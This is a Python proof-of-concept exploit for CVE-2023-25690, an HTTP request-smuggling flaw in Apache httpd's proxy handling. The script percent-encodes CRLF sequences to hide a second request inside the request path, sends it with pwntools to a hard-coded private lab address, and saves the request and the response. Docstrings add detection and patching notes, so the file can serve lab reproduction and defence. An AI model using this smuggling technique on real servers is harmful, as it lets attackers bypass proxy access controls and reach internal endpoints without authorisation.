CVE-2023-25690.py
from pwn import *
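def request_prepare():
    """Build the raw HTTP request used to reproduce CVE-2023-25690 in a lab.

    The contents of ``pre.txt`` are read as bytes, and spaces, CRLF pairs,
    ``?`` and ``=`` are percent-encoded so the payload can sit inside a
    request path. The encoded payload is wrapped in a path that itself
    contains encoded CRLF sequences (``%0d%0a``) and then placed in the
    request line of an outer ``GET``.

    Defender note: the request path carries percent-encoded CR/LF followed
    by what looks like a second request line and headers. Encoded CR/LF in
    a logged request path is therefore a useful detection signal on the
    front-end proxy. The remedy is a patched httpd release (see the CVE
    advisory), together with rewrite/proxy rules that do not copy
    user-controlled URL parts into the proxied request-target.

    Returns:
        bytes: the complete request, terminated by an empty line.
    """
    # Context manager so the handle is released even if the read fails
    # (the original left the file object open).
    with open("pre.txt", "rb") as fh:
        hexdata = fh.read()

    # The replacements do not interact: no encoded form contains a byte
    # that a later rule would rewrite.
    for raw, encoded in (
        (b' ', b'%20'),
        (b'\r\n', b'%0d%0a'),
        (b'?', b'%3f'),
        (b'=', b'%3d'),
    ):
        hexdata = hexdata.replace(raw, encoded)

    uri = b'/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0aUser-Agent:%20Mozilla/5.0%20(' \
          b'Windows%20NT%2010.0;%20Win64;%20x64;%20rv:120.0)%20Gecko/20100101%20Firefox/120.0%0d%0a%0d%0a' + hexdata + \
          b'%0d%0a%0d%0aGET%20/abc'

    # Host is a hard-coded private (RFC 1918) lab address.
    reqst = b'''GET %b HTTP/1.1\r
Host: 192.168.27.139\r
\r
''' % uri
    return reqst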
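def send_and_recive(req):
    """Send *req* to the hard-coded lab host and return the decoded reply.

    Opens a TCP connection to 192.168.27.139:80 with pwntools' ``remote``,
    writes the raw request bytes, performs a single ``recv()`` and prints
    the decoded result.

    Args:
        req: raw request bytes to write to the socket.

    Returns:
        str: the bytes from that one ``recv()`` call, decoded with the
        default codec. Only one read is done, so a long or chunked
        response may be truncated.

    Raises:
        UnicodeDecodeError: if the reply is not valid in the default codec.
    """
    ip = '192.168.27.139'
    port = 80
    p = remote(ip, int(port))
    try:
        p.send(req)
        rec = p.recv()
        # Decode once and reuse the result for both the print and the return.
        text = rec.decode()
        print(text)
    finally:
        # Close the connection even when send/recv/decode raises; the
        # original leaked it on any exception.
        p.close()
    return text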
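# Build the request, keep a copy of exactly what was sent (req.txt) and what
# came back (res.txt) so the lab run can be reviewed afterwards.
req = request_prepare()
print(req)

# Context managers guarantee the files are flushed and closed even if a
# write or the network exchange fails part-way through.
with open('req.txt', 'wb') as f:
    f.write(req)

res = send_and_recive(req)

with open('res.txt', 'wb') as f:
    f.write(res.encode())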